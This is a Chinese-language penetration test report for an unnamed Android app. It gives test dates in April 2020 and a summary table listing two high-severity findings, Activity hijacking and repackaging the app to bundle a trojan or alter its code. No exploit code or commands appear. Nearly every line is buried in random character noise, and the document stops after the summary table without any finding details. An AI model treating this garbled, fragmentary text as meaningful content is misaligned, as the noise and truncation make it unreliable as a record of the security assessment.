+ U- `4 K9 C% ^* d- d
* ]' t8 b* X- T" L! E
; e$ l1 E, {) G8 u7 k7 O- [
1 R. G t E) m' q# a
9 b: g8 n) i; U* t* @& t
6 Y( q( T' \ R& Y0 _# Q
- i* M0 M* A5 S
- @9 T, B6 S$ U& B3 \* N ! R U: l+ ?$ g
* v; G$ l' }3 u9 l4 x( J/ Z
& s; h; N4 T& C1 v* k8 S4 x0 T$ u
& L9 s1 {2 k% j3 v 文档编号:
! }$ Y7 T0 S8 a0 Z* F0 ]" F
8 I4 K1 \; L4 B# m
2 Z0 p* z4 @7 J: t( R! Q% e& Y* Z: O
7 P' |0 o! H. `6 Y- L
$ [6 a/ X9 P4 i
8 X& K& ?6 q J1 d8 R' u1 j9 _1 s4 N# }* ^
+ }! r8 C- B9 r ]' [1 F$ y
/ P/ {/ C6 Z }. w; ?2 u c
1 y/ S; W8 I) q/ F( y" t* F% C5 K$ i
4 W" g9 [8 [9 O ?$ b5 A( ^5 O: B& M4 l3 i6 |4 {) z
' r+ J8 p9 [$ ?0 c9 Q# j" ]; x. {; \, ?) X
5 \/ L$ Y6 i% Z" w. b
6 v8 o4 Q9 Z' ~& e$ q/ N, n
+ h9 T" `+ f5 }2 r: }& p# v5 w' O( {0 t* N
) ~& T0 c* F# } [" {' @/ S
! `; v$ h/ e" k9 `
: D1 g2 g- _" d$ n" ^
+ V; d1 q5 P. ]" D2 Q" a; E
" m8 T, |$ b* ]' @7 g- `9 y5 ?7 D! g% S2 T/ L) C' W
) [/ x" x7 v/ w( n; E) T
2 K6 `2 g# j. t$ V' [
3 p8 v. Y+ i. E
; ?8 N2 k' z: q# V7 c; p* e 1 q0 B& \* g+ G3 S% [
& z( R. _' v4 w( r. y0 [: C
5 t6 p' w3 X3 W2 T, h) ]0 x5 n" ~) {% v% {
: G7 U$ @7 v9 j, L( M# W4 x
) r$ V: X. S3 ?: f( J 某某某APP渗透测试
! g5 q5 u+ }' ~0 J0 u7 K6 L4 w9 B2 e: F: I7 n. X4 |( }8 v; V
1 x' d& X( c1 E1 }8 d3 R
4 B z1 [! i+ V- }9 u ) I0 [1 S. \+ ^* @, Y2 A, A
9 P3 C0 _3 q1 s3 D
: ?: z& \% d c& u* P- C2 l7 r+ s% L
3 V V( _! J- Q5 h
, I) C; ~5 d5 M# q* D- r# D6 Z. N , O ?1 m. t# ~! M# X
- I8 j5 B) q9 P- A' S/ H* {
3 G @ m; Y7 r% m' {3 i" G6 y$ ]8 k$ [! P3 }5 M
! ?9 o9 _- V) A0 U. u# x+ E) _- Z' Z9 }+ K x% H
* I% J7 v6 u. e. o8 T/ k' _4 ?
1 d U0 V( G! m7 T" g6 @6 }5 D
! J) y! o; T; @( ?1 D W/ }# s
1 A5 `% e/ y. Q: W
7 j: A6 k- i( c$ U1 q% u& F! S, m- S& w) O( ?: G# m
P* _# Y8 u) [3 ^! ?. C. b' Z/ p& p
5 P* ^5 z, e5 |( @0 k5 ` 0 ]$ V) q$ n6 u, v1 {6 K( H/ m4 U4 I
, B% x5 b& y" X
% j: w" O# J2 o6 K5 z/ K. }7 \) F( n0 F
$ n7 j3 }7 j+ z: E9 Z, x; v* P
& a& \2 \. _/ y, M5 F 技 术 报 告 j4 G7 b7 T; I
3 r) S# e* q, x) b+ r9 |1 \. z" }3 ?
' B8 e& W% [$ s! L2 J+ Q
; w& U9 @% q: H! ?0 F
; z! G( g- P6 P+ u! ?/ M
4 V: X, y) I4 r& d3 R B- ^) t0 d / I6 z! i8 c$ {8 E. Q# a& y+ ^* N/ v
& t$ Z: m- K% f; I9 T
$ s; }/ [. @$ A8 K9 c1 K( y
8 ^- ^- l8 j4 r- S + t T7 [5 X" c4 `# z% b
" t* `# i: |, ^- R
6 D5 y* }1 W& R& A+ A6 \# x1 E+ W$ j1 G/ S
+ ?% |# u- C) m8 N8 b/ }- e# d
1 Y5 `/ b. C. w/ t( R
# i1 X2 K8 `& _1 M9 s* d
7 [: j4 `/ A4 s . u- p9 c( R9 y- ]3 H6 u# Q
6 w7 X( r# Z. }2 R" Z+ @
' J! {$ Y( Q5 q) [
# f' _# u; a- ?7 u6 X
( _, _+ E% w4 U+ ~, J! \. N
! f% N) l* T9 J x, ^4 ? X5 r0 u: ^ c2 |8 i M. Q
# }# o, i& |' E3 Y
# b. L* y3 W; R) C; M
3 x- h# e6 S" v- e' M: S' t: g
3 b9 f, ^" Y- p; _8 }# G9 q/ Z+ h# e. V) _1 K G0 J8 {
' d z6 c. r' e( }# z, F+ ^* n
. f1 N. M5 R5 k6 [- ^' i U2 ~
: V- K1 `! e8 N5 @0 {6 O
7 Q# \- L% p9 T : k& c2 S4 Y$ T' x) B
7 _$ B" Q, m, M# B
7 A! |3 C# Z# K6 w3 ^ d5 y2 p
" N) c4 }8 Y# ~1 f4 L8 a! E
?' G" B( J: r3 p1 }" X3 n
( @$ |8 t& V# |; M7 P/ }! M# u
! ?# m; x, o' ^" q, M6 `% S7 b6 B6 Q- [7 o! q9 X
; t: C v) R) }. y* u
* S7 F: a. n& T# A- j0 K2 Y' I+ r
1 c+ x( E- s4 F3 {% Y, O
9 m6 n- g( ]8 B$ m7 S
' A( Y! T: A9 Z ]$ S0 V& U8 k- k
& ]3 }$ U4 |, c6 X: [: }# K; P& x7 _) L/ j+ M 9 y! t) |) B9 j8 }; e; p) X" ~
5 k. m" g6 N3 ], R; q
' W; C( B% u* T7 |* m1 P
}) @/ Q$ y6 x " N1 d1 R8 D0 w. L
+ C4 ^. y& l0 z$ O. K' _ 9 |2 e# O# E, q0 ?
$ B5 A. \0 x$ C( ]0 v
$ V3 @0 W4 j0 _2 b6 x+ `' d2 E
7 z. R5 F$ H0 e9 E4 p
; R5 v1 { H8 L* F9 }& _" X
! N R& d: U+ p+ C
5 W) |0 n1 x7 ~9 A: I9 h
9 s! Y* c* @2 k2 l- `5 G3 B; |
- [% `; @3 k. T; T; I+ ` T) q; R# l
% w: T/ h2 `2 o! Z- C8 v! e
- A: C' c* Q4 Y3 z% H; } w; ^: j9 |+ b+ u3 z" c ` w R
' J; I* Y8 d8 g" \; v$ {
) i, K2 r' j/ c% L
* h& ?/ N( K* U$ M9 o, `, r+ w9 N, z/ ]
* v+ C+ `8 {: x# v
" h" l5 Z- y; I6 C- O5 i6 s
1 r; R% f# G" ~3 M' w8 e
' a& Z. @! v9 Q% H" G
" m/ o6 O0 @5 L) \9 l( n, t+ x1 ?+ S
2 Y; {8 e9 A% U) h1 R- n9 D
9 {0 e% L7 w: J7 n' p 3 N7 u1 t0 l7 T( K- I
4 N+ H# O" ]* W/ a/ y
* n# Z" ]% X" N5 X$ p8 Y* m* K4 X; M3 K, x, L. x8 b
) }& M, W9 `' t6 r9 K5 q7 a
! O1 z7 m# h" h8 z" q
, L: V8 z! K0 F# D- B9 D0 q" ?
w9 j) T) ?0 i |
) P$ N$ J9 h1 h6 B
N6 E7 a6 z0 u8 J2 X6 X" T
N6 D; d8 ]& i7 x. M$ e# \- T6 f. H" c% F1 d9 k
) p3 O" X" ]; {0 D/ H v% d
. J, b1 H8 j6 B+ s$ T
0 \5 u' b5 d5 |- b2 Y' ^! I) d
/ _$ Z$ H @8 i5 V( S+ e# ^, d2 u c
- m* F, ?" q8 W: K
1 r3 ~9 k: Y5 a+ Q+ L0 S! R
2 E+ G& F, Z2 y9 ]9 ?( ~) }
: |8 ^+ S4 W8 m" y# C \0 _
/ Z0 Z/ |# X. k
# X- {% t6 D- L' @6 T$ S, K
2 R. v; F. S; X( M1 [( _3 y) E7 _, E7 u. T6 X$ a
. [: p& H }! q7 u B
8 Z8 k0 M# E6 |; M. a ' R2 M" f2 G, Z
, L! r! w0 b+ r2 W! Y% j
1 X; A: N: y8 v6 B! M! {
2 p! t8 G" `' w& e0 }* m/ H. E# P . F# a" q( {( p) }9 g U7 ]4 L4 k5 j
/ q& a7 Q# q. D9 N" d4 \
7 j* X: A+ U7 \- w
, L+ ~4 n& O4 b" Y4 r8 M4 ]" B
0 H4 l# c6 r5 F" `+ T" B
' b& W( A! i& j: j/ b & X( F# [5 z+ }6 N$ V1 f
* ^ h2 P5 a( ^1 C 二〇二〇年 $ p4 E+ k; h1 K- f" u1 G) ]
r; o# y& i% G: w+ _
. X% z8 u! W- C$ s9 u- x" b' C* d
+ h; F3 D, p2 p; {' G
+ \, C( k$ _1 n; Y; {; |/ I0 Q
6 v; J. v( u/ i( T* X5 n7 ]
, L) _5 e+ b% o/ a# B8 _
- Y2 ]8 h" C1 L5 p
+ C- W9 t$ g: J) m9 A
9 `) r R; ]) r5 w4 e. X. w
7 G0 w# R! c: P1 } ^, y1 u, m: m; f3 y8 ^" S. T4 _
/ L! s. X) G7 N) s# v9 v" n% I1 o4 g3 d( ]" p
. k) ?1 n. P3 _2 o- k% b% n) z: X: G
6 Y3 D. w! r9 o) |* R8 W/ M) M4 A6 q1 ~; O2 q
- @; I$ C r1 a2 N# d: v$ C
) X$ L: S) V: T4 q: L3 \* _5 d! l
+ Y' R6 w" d) E$ w
) y1 v$ K8 `+ c5 l 目 录
. P4 e2 v6 E; T" ^/ u6 j9 t- u2 ]* Q0 r
; e4 i8 h/ \/ |8 t9 i9 {& a8 l/ H/ d5 L8 W4 K7 U* {7 D
- \. Y. q" n5 g; u( i6 @0 P
! A! }+ K+ m) v; O
3 |& w( {! O$ F# ], ]+ n
( ^8 Z- R6 @) L9 D5 a
+ G1 L& ?8 e& w* C. B6 m+ r
- d/ a9 R6 A) C
2 q' }6 h4 g; G
; }0 f8 T6 p7 d0 I4 G1 i
1 q9 H1 R2 J7 O! z2 W# Y* |) Y5 c
; O, A4 t) x, b5 |0 d5 P" C/ p8 { 1 概述... 3 % j7 l4 |# J/ o/ Q9 Q
; z3 _3 O# p& P5 y3 M
2 Y! `1 e1 G+ T, n. W
. Q; P& V; D$ k. h+ M8 Z
' [4 |) J( A9 x) N( C: }( c4 S4 x+ m- I
1.2测试时间... 3 - Y2 S4 w) V1 g s: Z7 _
! A6 P% b+ f- J& _2 X! j
, g Y8 F+ _9 w
$ }& u' a5 ], M/ t: M `3 y* [0 \
+ E1 S; E7 X; `# f& T" A& G3 N
! X- _/ x0 ]% a
1.3测试对象... 3 & H! N; b& r' M3 Y
$ `' z6 K! a: ^
; w, ^9 h4 A) l2 l7 i4 A l: u4 R. V5 ^4 g# f
- G: G- G( t3 G* p! W! a+ \2 R; |
* X5 ]. Z; @ j 1.4测试结果... 3
: o* w3 l8 {( d- G( i4 u& \
; [. Q9 X' u* f' R+ F7 O O. h, z
0 v. Z- `, g7 Q/ O
8 C& T( T( Z b z
- j4 p4 r* x: F8 i- Q& A
$ y# p+ c- H' h6 R 2 检测结果... 4
: L' d2 d' R, r3 D' p5 D- h- b. z6 P2 x# S' W7 D! |+ P6 {
4 M7 y8 d' Z$ U) s" l
N4 L/ b9 |4 E1 b$ f1 e ' \4 O" H$ g B- {$ t. L6 B" a
& d: I6 x. a% J. @" }* K$ h
2.1 某某某... 4
, X0 j+ n. ~8 Z; J) B' @7 x3 ?3 P% P
& M" g9 r. E1 }
2 t# V- L8 N1 m& T/ G
: Q& d6 w, c* n1 C; E! |9 X/ T
/ V7 h2 ~# R. P8 f5 h9 i8 b! ^4 n1 x- H, D( u& I. m
2.1.1检测目标... 4
' U% Z p% C: b# s+ ?! E5 ^* b2 y3 p' m4 J E% q
! x. m: K8 \# A" B8 i( r* ]1 ^0 j2 ]6 I* b. ~
$ ^2 Q/ O$ B2 K: r+ t" Z4 u* i
3 x% x7 I1 e- }. j0 w 2.1.2检测结果... 4
3 ?3 `# ?/ T" f! G( n! D1 h! {) F
3 j: F! n1 C3 z# m/ l5 ]
7 y; W3 L; |0 x1 k' R8 A
, j+ T' }3 p6 |0 o* M/ y
" `! R1 | m! g
- I8 f+ U! m0 e' O- F7 C
2.1.2.1. 4
; k: `4 N. G: K: r! f. F" ]/ O
8 m% H- l! }5 N; R5 X
5 ]( q$ a' p2 G3 T
; [/ I4 ]# `8 c* B, x% c- n. t
; ^& j& W3 E5 Z s0 [
- X) r" ~" F, c7 g& r 2.1.2.2. 6
+ n; y- Y- `1 H) }/ w- k4 }7 P7 O; U
: i4 s1 ?8 b) X' r3 S2 Z% B
2 u5 E0 k+ }" W$ l
" p, F1 s* y* D, }1 O0 D+ I; }+ o/ F5 T8 O% f* i: ^
8 y+ ~) s8 V& \/ G2 ]& n
, Z- M% F9 a5 O& j
" ^7 ~+ h' {, O2 [! T2 W
9 Z( M k" Q* H. V6 B5 A
1 j' B, c, ~% z; b0 l7 d/ Q; @
, R# E6 n: C/ T/ H: B
" s, r7 J1 v7 w9 ?- b" O
* x% h: ?% z4 c9 B
J; f; w3 k3 G# p( ^3 ~
9 x$ ~5 K3 b8 f6 U" a
! g0 K, b% d( \# D. |0 q A
3 M: N1 p4 ]% {, @- i
% n R7 U4 d4 B. N' r$ n: p
6 y: u6 d0 f; @8 t 1 概述
; `1 O* w8 o2 P# |7 O3 `
, F2 u# C7 s8 I, J% x, l1 i0 s
) ~7 c0 S' N) f# V; l
4 I1 `' s" f# W0 ?8 F2 q
$ {5 ` p! U! c; ?' I0 K
7 i% {8 J W8 v7 x5 {2 W 1.2测试时间
- [2 s% D$ Q7 J. }: g0 e# D* }" t0 ?: r7 i6 U1 O% o
1 `& b4 s5 g* n* ` g5 ^
Q. N* s ^8 R5 z, ? A; E5 m 6 B* ?1 G4 f$ k) `) x* N
' s2 Q! R- U- L0 |, z, w
# `3 ?1 z3 F" I8 \/ m5 k' x; C, ^& ^0 u3 U+ Q2 `0 k
7 W' B+ V& d! W" \
0 e3 Z- z/ Q A9 n$ N
" D$ n' X! B# ^* i- K* f
* p2 h! T+ ?" I7 T, B e' d
& T# |( ?5 u1 }. W9 l0 E) p/ X: T9 J$ o' ?
渗透测试时间 + D# [: P& a7 g; `8 z
' M1 \% `4 q# K1 P3 g4 j' s
% K8 P u. J% ]* C6 j6 J$ r( U3 y8 j% Q; m
| ) L0 c" w/ E, E: a9 d
2 l. P$ A8 ^" r& O. z. ~
% {7 R. C" V8 K7 R' _! L
" t1 y G" p' \/ D. s! R
. D: B( [3 v# l3 T1 P
& X0 u2 A, M6 e
; j5 p$ u; E7 K! G0 n( s0 a
$ Z9 Y6 ?; z9 y' U/ G% I9 I+ T" e ) k2 D( H3 u1 @: ^/ z5 s, K
& U0 S f7 ^( A( n C
起始时间
O2 k ~5 L: G% D* {: R' C/ ]1 y$ V+ q0 o2 K
0 k3 E# B; Z6 V1 o7 p6 D
6 a) e. I% h F4 Q, S r% \6 ~ | , l! f9 `: l8 i( r! X4 M6 @
4 x, \8 p* G4 d! e3 L
9 F9 E+ g( y7 U J6 S7 {% g
. ~0 d3 [2 `' |
* O: C6 C/ W: V" u0 n
9 ^6 T3 Y4 y: H2 Q( g0 I3 T) R 2020年4月6日
6 P5 n4 C. N3 N! d. l+ ^4 L
( I5 @/ q8 U! c- T
' E! ^& [' ^7 @% ?" y# R* v$ v7 y5 _/ F5 c, i8 w% L# A* ]2 I: O( e
|
2 M6 d' K6 `! v, s# {! r. k
2 o+ U; H4 ~6 c# k7 l
+ Z8 s8 x$ U+ X9 a" `: k) g' N+ x$ P) D2 O
# T/ x& r# H* f
' I5 P" c! b6 ]4 f
7 B- ~. q# ?, q: `* [6 F
4 [+ R7 v0 M3 h& j# k
@& j) P! R. i" P# `
! e5 L0 f' r9 u6 r: N/ q 结束时间 , g4 O5 N1 }" r
4 b. }7 n& M, U9 V; k# r
8 `0 ~8 D( l: q
, M# F- Y. V# H! r8 P& z3 y |
# N+ ^6 [: B* `! J& i
6 {+ J* u, t3 ^$ Q4 }; q 2 G; v# @7 {9 C; n- u; i2 P
3 x# u3 y$ M5 Y% `" l! K `1 E
# P0 k! m4 n9 L% e6 ]7 j
3 @/ i" _9 \9 @+ B7 h
2020年4月9日 8 D+ ]* x* B6 H+ L
3 e7 e% L- u( U8 v
% P7 S, n% o# T1 t+ L, j5 u8 y1 R: R6 \ H: n8 t$ x
| * S& }% h( I& {3 I* X) V% M9 d
( R7 p2 w8 b q$ p& s' Y
" Z7 z- U+ N1 x7 w7 X0 ?/ u8 O c
. F" ]* g9 G& o& H
- B# @6 \- Y1 h& T+ I- B- T
8 b4 J( k# G" G6 m5 u
4 j6 d/ T7 }: W, j$ z. y& w$ J
3 |# n" T. V" U8 F
" `9 _5 J# D' u) E8 z5 y
1.3测试对象
* [% ?1 N8 ~2 k* l5 g" i9 o* j6 ?, @% w) Q1 Y4 [2 C% y% ~8 S
' g7 P8 n: c& U) ?5 G
% h/ S T3 c x 2 }9 w6 O$ q! j% l( }# z. U
$ }9 J. j' f3 f* ]( x$ J7 o 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: ) _; W6 Z6 G1 [
9 {' }1 V/ @4 C* q9 x
# k9 F4 `% R3 f5 i7 ]$ ?) g; I. D
+ c4 o a. H2 @% \8 m( q
5 y) c8 \/ i6 O. j- ]* k9 c
) x6 U6 q* T& `7 c 表1-1 检测对象
5 G! X7 n" z1 e& ^. X
1 R y+ U+ P7 C, G
8 g/ c2 D6 b" `) L) I# |0 T, j
* Z# X; c u. J) L7 Z- i
& T! d# L1 S6 @# |' V3 Q* Y
) Z4 Y6 j+ j% q) \0 p4 D7 H. \5 l/ { 4 v* O% J5 \5 i( k1 c& v# ]) z
& D; u0 g. ?4 X! _, d8 _" H" [
# E/ A3 p3 c$ T+ _/ {' w
* p! S; c3 i, V' `, f0 |* }8 Z
! I7 S( d5 F2 {& S3 k1 l7 V+ j8 l: Z E2 v
' }) s! R* f" z" { B* W5 |( z
2 j# J& |. @: H- ?( w6 N* h
序号
0 ]0 S0 v- g- p: ^" r6 z% k9 Y; s# p% N
) A' z' w' i% F2 v2 C, T
8 \, t" ^; v2 X' U) W& ^( B |
. e& Q9 p/ D6 o. i4 T
; r F; k* a. W: S - E8 ~. x( n. M* D& G& n
/ z0 |( d' |; |9 x7 o) `4 E- E5 j4 }
" y3 X" _+ F0 {" j
$ J7 Q: ^8 B4 Z( N7 }2 T) D 测试对象
D# R- N5 l2 N' f( d H# P3 l; E: J' q: J/ g8 `
( d& a }1 e, A6 C1 Z: o1 Z) M
* R1 @' y+ \# i* y |
$ L& d' h9 I! k) D. g# R% X F! Z# Q3 f) ?7 n/ n
/ ]" U% C0 b. M* U4 V& J
+ ~) d( f* h* s: @4 T% N) H
% |, _) v$ i1 w, ^& _# d: f4 C: ?* o
测试地址
& i- Y9 X" a' \$ n+ a
; {" d) i* g8 l8 E0 w4 E / R# c$ |6 t: E- C e( I4 u
& a, m( ?5 q3 B2 a, k4 w/ d2 O | ' h- M0 r ~8 ]
& q# U5 q+ C/ P0 {+ \. Q 2 Q3 x4 q, j6 D& O
! V; S( w; \1 n% E& T3 z9 g
; \) Q. _% p p- J3 e4 I2 X3 F4 Z2 P* M J5 H
安全漏洞
( ~; X) \9 U& ]0 i0 f F/ a6 p" } B; q! l* x0 ^; W& L; |- q2 o
6 [3 r; E% I- u6 T6 O# Y
+ x9 P% o9 I, V& x, K/ k |
2 ]' E4 Y2 p( Z
6 F" L3 A" B, Z2 J& ~- V1 T3 F+ H
' u; [ e: J6 l; @, J% y
& t0 v0 A6 F( T1 S$ Q6 I q
" f3 x, B6 I( ~3 h8 _- y3 N* t, Q* v; M# y$ q5 M
R0 b+ U% K& i8 x
0 L3 @# L: T/ A" [0 ^" c3 K* `* M* H/ G% _; | - `! b! D9 q1 u# ?* p( n. Y% l6 \& W4 D
0 V/ X$ N% y0 k# }
1
& ?/ \3 T+ F5 L2 _6 \& [ \5 Q
: r9 i9 s2 `$ @ E% H/ O" Q. T ; R2 t9 L! P/ t! h( K9 q8 t& A @
5 z& P* `# X( E. p" c3 f
| {( e0 W/ j/ h: a. Q
3 v+ K- c7 M: O: ]4 Z, ?) v ' O7 |1 D0 A2 Y0 Q; W! y! t
& ]0 r" X1 q+ f* V6 t; _ Z+ K* a # c( B) z9 a2 F7 f: D: ]6 ]
: b; z1 r! ?0 \7 B3 \. {
某某某安卓APP + h+ C9 B9 \! Q: [2 y8 v
+ Q, T- u- p8 [1 b) }1 z3 h" w% p
% z2 M: @: a$ Y! n/ Y% |
0 Q( s$ J' {* D- F. O+ Q4 K | 2 Y* Q2 q* h: d3 w% i
8 J. |% C( V6 |% z) `9 G8 N0 D
5 C8 h% }& M0 g
% Q: `2 p8 h, S
% N1 D- z! j. P9 E2 }/ U$ x
' [/ F$ R, ^2 k7 V( R2 Z0 l* W; g O7 l. I- b! Q2 [, n1 J& }
, \; O. Y8 a' s6 k: D% R h2 v6 [
! J p) S: M2 v7 ]& P# s! r2 y
2 f9 `9 l! E! W9 Q$ L | * d7 |/ D- _2 i' r" T# M: g
& c' F( s% E/ X# n3 ?( P
2 \" U7 _4 h. o5 @6 S; e
! n0 ?; g( x! e8 h6 k! Y
8 A! U8 T" D- c1 i6 l1 ^% ~
: n" G! H9 C4 x$ h# }
2
) g# ?7 Q/ [8 M. |" f4 k- v# J8 m' [7 n# J6 F$ T3 ?3 @# e1 q
8 P3 f1 S5 I4 ~! y4 A }
/ }: X8 l1 F, D- Q) d9 c
|
9 ^* Z% m0 I& O7 C
/ W# _) U% }- q0 G$ @
% D) `9 j/ G- F1 e
0 V' A: E3 w/ c) x" ?- O% d
; q: \: x8 f3 O, q# y( m0 y( k) q, ]! w; `3 z* A
6 ?. z& j& u, d
! ^' {& [- L4 K
+ A& n, V4 f/ r4 k' D
. v. j+ K" `* b% { 1.4测试结果 3 r9 {# e) _6 H1 P. t
. ^9 h, U2 V7 f0 W
: B; X5 D. m- o7 i! b
* ^. |0 T9 X1 G- z+ t4 W: [8 s & t+ I! J/ F" Z; Z* i$ J+ m( O
2 A( z/ `) H5 V
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 7 i9 B4 N7 [3 W9 X- L: U
8 A- A% A8 e9 s: y/ @
9 N" y7 u! o1 @# B8 K/ h( i- C
( R! L: D- u7 V0 X. E 0 l" m' B( A: N# l) C
, A* y) \1 v' Z# G" u9 V
4 j# J( X. n0 N3 K: ~5 V: j: J& c
0 L9 g9 m; U! c: ]$ `5 ]( S% G8 F, A
% Z- @( ]8 R- Y" Y+ z
- [5 W! Z0 t3 @/ P9 H
7 B# }* |% S7 ]9 [) X5 {- K2 S1 l J% I0 i
' b% R! _* S& }: u# ?! G3 P2 d5 w6 _. ^9 [1 F2 R( I
6 @% J( }& G. C/ \. ?& L* [( R
! d5 s& \; Q3 \9 B& e: E/ w) j( L
. O- S: U& ]9 Y4 z. U- `2 v" U* S5 ]5 s
+ b( e9 A6 W2 q- o% M3 D4 M( i" M' u- H
" s! L. I9 d! ]# J) E0 n
2 V4 i: f, ]/ l' X0 s5 f2 g& w 序号 4 h5 |+ _1 U& K% k
! l; E3 @1 @6 p$ I2 F( J
2 y- V+ y. v( [, p2 G+ Y
* G0 Z& S; _5 ~) B0 Q+ S1 t* D |
5 U. Q: m0 t& z+ x+ V- ~ ^- U+ x+ a* M7 {
" D: O+ N8 \4 O# W
$ m9 k( N; G w0 p, J1 W : S' b/ ~4 B+ t7 X o9 M! B
( s/ o3 M' a( c4 ~$ |% @0 j/ d; E
系统名称
* K9 a: _! K+ f1 Y
; |9 B9 y, [. ~# t3 K5 P
: D* ]. j% P$ O; ?1 `+ M+ h) h5 _" w
% Y5 D! j8 p1 ^7 Z | & U/ q' S9 e/ ]8 t- s+ X
& k( c- f) x+ g( |! o2 n% D
" Q) ^5 q* n/ ^4 o* U( {
" C6 u2 ?5 v2 f+ f2 q" j; y 8 W) k; f) D% F9 S: k: F6 O
3 T. U1 n; M4 d- D9 _, x! G2 m
漏洞名称 1 r6 d" J/ s/ {4 m- a: B
, \$ }1 f7 M$ d9 p
* N% Z% ` v7 s% x' F- {1 J
( p1 G/ u' @# I. D" f3 _* N. Y1 S |
$ Z9 I3 u# u* x1 B7 J( ]+ E5 R) O; k: S* O
- U7 G7 Y' [0 Q3 {8 M. E1 I0 @
- k1 L0 ^! \5 R( \; w+ ~
/ c( P) r# i" }7 E" l4 Z
- _) k5 A4 Q' y) A- f% {% } 漏洞危害
) F/ q" I% g8 M+ `
# x2 a" c: k3 l% s2 Q0 J, ? - H0 G& u) c7 I m0 I
3 q. V! A3 A+ B. `( ~
|
4 \/ c- B( U @5 ?4 o/ x7 m7 _7 G& H0 {* i7 |: t
) T. d% ~6 S( u
1 Y) N( |( g* X# d0 _. q
/ o q5 @# g- S5 V8 C; y4 Q
, T/ z7 W# x) S. c: @. f7 ?
修复结果
+ G( N! q0 F; {5 {6 K3 U' i
. `* e2 H, D1 b( q6 Q ; R, \& A) W5 I Q9 O
' q7 A& M b2 O
| % p" d5 N* Y4 v. U% K! ~
! H9 z2 a5 N0 M- p e9 ]0 a7 b% M- ]! X
! \# h$ X% s, \) M
' f' m' R R% ]7 i0 d8 P
" e! G/ _6 F9 V, Q* i/ W7 `
& M( A$ Z% P0 U6 B, O" b! Z" P0 W8 [
% H& \2 v& \$ ?; O
. U. }, K4 m- o8 b' Q
. [& ^& ^# r: ~; N9 S I1 `; _
3 | f+ U S; t) l) `
1
; S P0 `+ ]" T" n9 }5 e* Z3 u7 a/ i- s
1 ^4 W$ d/ O8 n6 z0 `
0 F* ^8 D) x2 e | % L1 M9 A/ C2 G9 t) `1 D- T
2 z4 [5 w. n( a1 `" x P! U
( i8 Z$ J- n0 r( g; z: a) |9 g) J9 I' d/ ] [
}: S5 t1 O4 P) A; ~! ^
; D- m0 E T' R 某某某某某某APP : ?0 j9 O: `& R& L" T1 h1 w
: C5 k- g [0 D) I 5 w+ h# _ V* Z: f& W- [
' j7 \3 I1 b% z" O% L* x! S1 z) }+ P |
8 Q* N+ n- k$ t' G+ p7 a
6 e: B! [, _; P3 `7 }7 j& t9 E
0 a6 O$ `/ `& D6 d4 i
$ y/ `- @ |/ T: L
$ t$ ?* C, E$ x* B2 }" x s+ v* e+ Q O; C6 Z
Activity 劫持 ! {1 q# P2 r$ e% J/ x& n
" R1 D: W$ B& e$ R8 E6 u
9 Z, }: e( L8 u* h0 o6 R. r' O& x3 _/ ^) m
9 }! }7 y4 d W; J5 ~9 r' S
6 c# F* G& Q+ ^ L 0 C) J1 N) ~/ f
, d7 ^6 V E5 O& v) w6 g
! N) b U9 I i
0 _* y% F% o! K- J( l | 3 i5 r' i% A* @- O( i0 m6 k. |0 s
- C/ J$ \! N) n7 V
9 L- U- T M1 m2 \- r2 n( {6 T* K! ~' O; Z: ], [# N9 s- n+ {
D4 w% v B# a3 T" z; Y# V1 n8 I; @: {3 D7 ^; {2 S1 A6 n
高
# B9 D+ n3 ~2 {7 @3 Q) m* w3 z7 _0 ~# l7 \
+ x6 j+ G. M4 Q4 T1 F
' U/ v6 ?- b' k! K | 3 v# [" Y6 g* R- Q8 r. X) g1 G
5 m& A Z0 j" O+ @' ]. L' y - H$ b$ M/ A4 u3 a( A; {
+ L8 o# ]8 Z7 f
* L K' j+ R, j* {! S
" g7 U# v2 G; t2 }. Q: g
0 s& @6 v) ]$ v4 n$ ^- M4 }/ {9 w& B" m! p( `+ s g
& T! j6 J) G7 r3 O7 k% `9 q
: j( j k7 i1 [/ n0 ^ T3 ? |
3 x. N& I% i% j
7 \5 I7 K0 t8 A5 Q" [) c e
$ Z t" P2 H/ o' {. w
- Z8 v8 N7 G a
8 X" n- j2 i6 s
/ Q- x/ S( P, x6 Z6 Q / B4 S0 b6 g4 u' s. I& c
/ @$ k1 k6 \0 b! n2 A; \: P6 Y
( l0 X9 f- Y4 h2 @2 I, o- D
6 p/ M/ C4 n7 Q6 W. h2 t) b& P9 W
2 6 ]3 Z4 W* T ^7 g* p* t
$ P6 y5 h$ T+ e, O$ Y" z
* _: u& s$ Y& n: l/ k3 n4 ^* W7 C, _$ Z) j0 [( s" m& e
| $ x6 s+ g; a* x' Z, K, n$ v% d" x3 v, w6 c
9 z. O0 j5 N9 w5 ]
0 ? C8 t! F( x9 o+ X4 R( n7 k9 u. T$ X z
7 g/ F6 b4 ?% h! F5 J: x" C
, `4 w5 i, J& }
某某某某某某APP % f1 O3 w0 P5 K
9 V- `# |; x* a- l1 P6 r
. N, N' f+ G9 Y }4 Z: O# ]0 U8 a* n0 O
| 1 L3 J% g# m, H8 g9 e2 J
, q/ u6 y/ a7 J1 d5 V+ u7 B, `+ ^2 b8 K
) ?, i0 \- G/ T8 u( R" E2 _' }
0 b" f& l* l( i$ R5 F 2 ~" J1 B7 b5 S8 w' [6 @ S
0 |( d% c, I& }
反编译二次打包捆绑木马、篡改APP代码 1 x& j$ b. l7 Y0 m1 h
; p% o _5 H. ?; ?
" l1 I2 T' P0 l0 U1 o5 I( g" W
6 C6 e( U" l6 Y8 O: y0 f( p
| , a: Z% m+ k, w5 ?. d6 F0 C
5 a& ~. Y8 Y# L! J/ P& b3 ~ V
3 _: r: w2 |& V( f$ W' ]
3 {' N8 L% p: T8 y0 O
( o, V2 I# x& v' F( a) w! K
" ?, g: A4 t3 H& w 高
; v1 t' g2 ]' Q' z5 m% J* @8 s( z3 S0 l* }- o
- W( x+ L4 s9 ]( z5 y5 }. g5 K
|
# V% b; P) F8 z( n4 b0 k" z2 r
1 M, v$ s) W7 D8 p0 G. c* T 5 C: Z7 h* Z) Z6 S) V: G
- S1 |' p( Z( I" x9 b& H
1 {2 L, v# C! W4 B9 v
' x5 j! b, m+ w5 n" J5 V% E
5 j: A7 s ?4 ^! M! n
4 Z& P# v5 g3 A' a
% w0 u" x; u. \0 n
9 I2 U2 N4 |1 o7 B! R9 W0 C | 4 e: M7 R% B: E, `
" l H& l+ U. d U7 I' q% e! }
5 d4 l) \9 n& E H5 Z% G
" e5 Y3 P% F# a. g# n2 m, \
